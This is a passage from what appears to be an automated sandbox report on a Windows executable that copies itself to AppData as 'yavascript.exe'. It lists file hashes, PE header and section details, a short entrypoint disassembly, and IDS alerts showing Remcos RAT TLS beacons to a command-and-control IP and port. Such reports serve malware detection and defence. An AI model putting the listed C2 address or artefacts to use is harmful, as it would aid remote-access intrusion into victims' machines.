SHA1:	E0527FA4C0A6417A3DDF3871D7788C46E800529D
SHA-256:	06A39CA0E0FEEE82671B04C82F06CC83E1D8042B9E4EC38DB9AA97BDB3D71ED5
SHA-512:	DA897D679C583007608D3427184776CD95952CD96AA0E97E3CDF67F94D13336A676220BA2E73036DA35AC4328247318C31C3A9666108ADAD5C3C3F1EC0225BBC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD28.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.479140431694052
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYKYm8M4JhmaFz+q8CoF8gTa3d:uIjfNI7aG7VOJhDlc8gTa3d
MD5:	2113FF03F406211351E14AAA897981AB
SHA1:	977FF9DFCD607F03AD705ECC13434CCA6BE50993
SHA-256:	77DC8948507A7D3761E192ED4C36789BA6096B405E4357C93D9334F129A60F20
SHA-512:	AD839F00F7F1A31DB5647EA1F0DD3D8940DD3B80FCB37AC7D61EA949B31D45A30B8143A30BACE3358818B508F169438A87409F5C56CDF64B4D42614B98A4C928
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF78.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58320
Entropy (8bit):	2.125948605244613
Encrypted:	false
SSDEEP:	384:jbZVK8jlwc5CnokPpz1ykEQKICp0UPFy5t+IgA:jbZVnjmc5CnoqppyTQKZp0U0iI9
MD5:	A2B20CA8E2D98BC5ACBEC60F855C5095
SHA1:	8A3AB55889C5107B10F9C46B0A88EAB1881E9991
SHA-256:	F6E6906B61CB21F433379E2B070D9072415697A958E38C6D91D981838B26D627
SHA-512:	3FE9277F808D72D43E2EBF986C8A02B89DFAEAD9B9486258FEF81466A9E044821C4FD9669E7F5D5B3F5C108122A74E5751E487D45D69414273B79314B7594521
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T...........H...........................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFF6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.703286490585991
Encrypted:	false
SSDEEP:	192:R6l7wVeJeI96MfEO6Y1e6AomgmfpnpBB89bOvsfqIam:R6lXJD6MfN6Yc6AomgmfpWOUfqE
MD5:	03FF2049548DEACA86B937FE691CF7B3
SHA1:	3949FFCE1F4B1AC0B9C108AA8E0713777C206E0F
SHA-256:	485B1202DA96FE7B9C17FD0B1E0F3318017F62A1745597777BB92D60A78E5558
SHA-512:	BE45B6FD860A5E57F8F730F59588AC4D3863F204669FF5738092AE50886D9776ECE9BAA42388B5654C50E432113C542928B9D33A51816D5E816B2AD183DD8E60
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC036.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.481509046902114
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYwYm8M4JhmCFpdd+q8CQF8gTa3d:uIjfNI7aG7VAJhbdl08gTa3d
MD5:	43388257D51D27AB10A1479271E2F8AE
SHA1:	065281B90A1E75563F695FF0393087B054694DD5
SHA-256:	F0FBA4021F3085A45F7B16D125CB7F326F5A03FA147FE275983E012967ED91C0
SHA-512:	09394670FAC7ECADB4A0E74E6DED91D559EB8FAC52C741773569A229D1F13FD2748CF19ACFC97106C483AE5050ACAF7E6CEE513660843ECEA321D143C33E7F8D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\yavascript.exe

Download File

Process:	C:\Users\user\Desktop\ltlbVjClX9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	365568
Entropy (8bit):	7.72352709867459
Encrypted:	false
SSDEEP:	6144:CLsG3kR3ukDLr7YcSffnX80lpT/OlcCrmX1n66YZnKcGO9qXIU:CJUR3pD70nQ+66aKuYX
MD5:	41EDAD3DDF08BDF37CB05F98D91EA355
SHA1:	C4A6EF7263026D74C7AB54637CD4B336028143B3
SHA-256:	9E91474CE4C72005469F0884B6942940E1CECEE9BF425FD2739A359CA3299C5F
SHA-512:	003037D50227ED4E2E35070C4A1C3C73812AD37B462A66F03321DAF7924B6366DEC1FBFF67D1F9DC13143F8126CDE5F52668EB27B5AF157C34F6F0D771FD2BF3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76% Antivirus: Virustotal, Detection: 47%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@...!...!...!..vn>..!...s,..!...s=..!...s+..!......!...!...!...s"..!...s<..!...s9..!..Rich.!..................PE..L....t.d..........................................@.......................... ......z.......................................L...(....`..Pp..................................................0...........@...............T............................text...h........................... ..`.rdata........... ..................@..@.data...`...........................@....tls.........0......................@....rebuf.......@......................@..@.lituhu......P......................@....rsrc...P....`...r..."..............@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\yavascript.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ltlbVjClX9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.424301353889718
Encrypted:	false
SSDEEP:	6144:9Svfpi6ceLP/9skLmb0OT/WSPHaJG8nAgeMZMMhA2fX4WABlEnNO0uhiTw:kvloT/W+EZMM6DFyk03w
MD5:	0AA35520A2926BEB689F4987459A4585
SHA1:	3E10AF8B41E85ACAFC5AF43634D31D20E9C5BFE0
SHA-256:	0AB0B432E11F0A8EC7A032B63D95155B422AB2EDBB2650DE5CC7776E4A2CDF3E
SHA-512:	6AE3DB2844002E246B797111600A89D32DC69DC1DB1F4812CA3CDB5DA94EE5E0595BC932CFBECE830F825A1CE80EC9563A512F6094BABB5A653CD1FF49A1858E
Malicious:	false
Preview:	regfD...D....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.#.n...................................................................................................................................................................................................................................................................................................................................................Z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.72352709867459
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ltlbVjClX9.exe
File size:	365'568 bytes
MD5:	41edad3ddf08bdf37cb05f98d91ea355
SHA1:	c4a6ef7263026d74c7ab54637cd4b336028143b3
SHA256:	9e91474ce4c72005469f0884b6942940e1cecee9bf425fd2739a359ca3299c5f
SHA512:	003037d50227ed4e2e35070c4a1c3c73812ad37b462a66f03321daf7924b6366dec1fbff67d1f9dc13143f8126cde5f52668eb27b5af157c34f6f0d771fd2bf3
SSDEEP:	6144:CLsG3kR3ukDLr7YcSffnX80lpT/OlcCrmX1n66YZnKcGO9qXIU:CJUR3pD70nQ+66aKuYX
TLSH:	1D740290B2C0C171E82995382A56CB71467FBC369AF4864F7B987BBA0D721C3593B247
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@...!...!...!..vn>..!...s,..!...s=..!...s+..!.......!...!...!...s"..!...s<..!...s9..!..Rich.!..................PE..L....t.d...

File Icon


Icon Hash:	910711313d31d565

Static PE Info

General

Entrypoint:	0x401798
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64A47488 [Tue Jul 4 19:35:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	3d3ef5783e210ab7486c4b58c598d5a6

Entrypoint Preview

Instruction
call 00007F3910D37469h
jmp 00007F3910D332DEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [004528F8h], eax
mov dword ptr [004528F4h], ecx
mov dword ptr [004528F0h], edx
mov dword ptr [004528ECh], ebx
mov dword ptr [004528E8h], esi
mov dword ptr [004528E4h], edi
mov word ptr [00452910h], ss
mov word ptr [00452904h], cs
mov word ptr [004528E0h], ds
mov word ptr [004528DCh], es
mov word ptr [004528D8h], fs
mov word ptr [004528D4h], gs
pushfd
pop dword ptr [00452908h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004528FCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00452900h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045290Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00452848h], 00010001h
mov eax, dword ptr [00452900h]
mov dword ptr [004527FCh], eax
mov dword ptr [004527F0h], C0000409h
mov dword ptr [004527F4h], 00000001h
mov eax, dword ptr [00451004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00451008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000078h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5084c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0x7050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x50430	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x503e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f000	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4d968	0x4da00	2bf9007a57ed390869fe8bb6ad481989	False	0.9401796497584541	data	7.9182248790809595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x1fe6	0x2000	6d99129346eb4060d5bc3720f21411bd	False	0.3658447265625	data	5.600215078496436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x11360	0x1800	a83a57007a6b6a08ff409b4a505d6f07	False	0.14957682291666666	data	1.668556490329165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x63000	0x51d	0x600	d00a0884dfc2593613905d91d2ea3f37	False	0.015625	data	0.007830200398677895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rebuf	0x64000	0xc	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.lituhu	0x65000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x66000	0x1b050	0x7200	01ba6e744ce54fdfddeda5909acc61dc	False	0.6256853070175439	data	5.626008941407323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x662e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.6807036247334755
RT_ICON	0x67188	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.60514440433213
RT_ICON	0x67a30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5426267281105991
RT_ICON	0x680f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.684971098265896
RT_ICON	0x68660	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.6154564315352697
RT_ICON	0x6ac08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6336772983114447
RT_ICON	0x6bcb0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6418032786885246
RT_ICON	0x6c638	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.6524822695035462
RT_STRING	0x6cd00	0x152	data			0.5059171597633136
RT_STRING	0x6ce58	0x1c8	data			0.5263157894736842
RT_STRING	0x6d020	0x2a	data			0.5952380952380952
RT_GROUP_ICON	0x6caa0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0x6cb18	0x1e8	data			0.569672131147541

Imports

DLL

Import

KERNEL32.dll

GetNumaProcessorNode, OpenJobObjectA, FindCloseChangeNotification, SetVolumeMountPointW, GetModuleHandleW, GetSystemTimes, LoadLibraryW, Sleep, GetConsoleAliasesW, InterlockedExchange, GetLastError, GetProcAddress, GetAtomNameA, LoadLibraryA, WriteConsoleA, UnhandledExceptionFilter, OpenWaitableTimerW, LocalAlloc, SetFileApisToANSI, GetCommMask, CreateWaitableTimerW, FreeEnvironmentStringsW, EnumDateFormatsW, FindFirstVolumeA, HeapAlloc, HeapReAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, ReadFile, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-02T13:53:24.849316+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49741	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:14.210243+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49787	32583	192.168.2.5	198.23.227.212
2024-08-02T13:52:58.488348+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49729	32583	192.168.2.5	198.23.227.212
2024-08-02T13:56:19.101998+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49819	32583	192.168.2.5	198.23.227.212
2024-08-02T13:56:14.846295+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49817	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:16.937426+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49738	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:22.210207+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49740	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:18.251631+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49789	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:26.178799+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49793	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:40.049607+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49800	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:19.570573+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49739	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:16.173539+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49788	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:20.332255+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49790	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:01.150194+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49730	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:27.456264+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49742	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:06.474561+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49733	32583	192.168.2.5	198.23.227.212
2024-08-02T13:56:07.972672+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49814	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:51.358621+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49752	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:03.842152+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49732	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:41.195335+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49772	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:09.080890+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49734	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:59.989288+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49810	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:38.935844+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49771	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:45.772159+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49750	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:24.237622+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49792	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:41.969666+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49801	32583	192.168.2.5	198.23.227.212
2024-08-02T13:56:03.977546+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49812	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:52.161542+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49777	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:07.019890+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49758	32583	192.168.2.5	198.23.227.212
2024-08-02T13:52:42.393942+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49714	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:54.041670+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49807	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:49.846572+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49805	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:40.517707+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49748	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:09.291961+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49785	32583	192.168.2.5	198.23.227.212
2024-08-02T13:52:55.847548+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49726	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:43.411661+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49773	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:17.551523+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49762	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:01.799791+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49756	32583	192.168.2.5	198.23.227.212
2024-08-02T13:55:00.708066+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49781	32583	192.168.2.5	198.23.227.212
2024-08-02T13:56:17.073684+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49818	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:37.904286+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49747	32583	192.168.2.5	198.23.227.212
2024-08-02T13:53:56.580595+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49754	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:36.702611+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49770	32583	192.168.2.5	198.23.227.212
2024-08-02T13:54:24.837901+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49765	32583	192.168.2.5	198.23.227.212
2024-08-02T13:52:47.751336+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49717	32583	192.168.2.5	198.23.227.212
2024-08-02T13:52:50.565712+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49721	32583	192.168.2.5	198.23.227.212
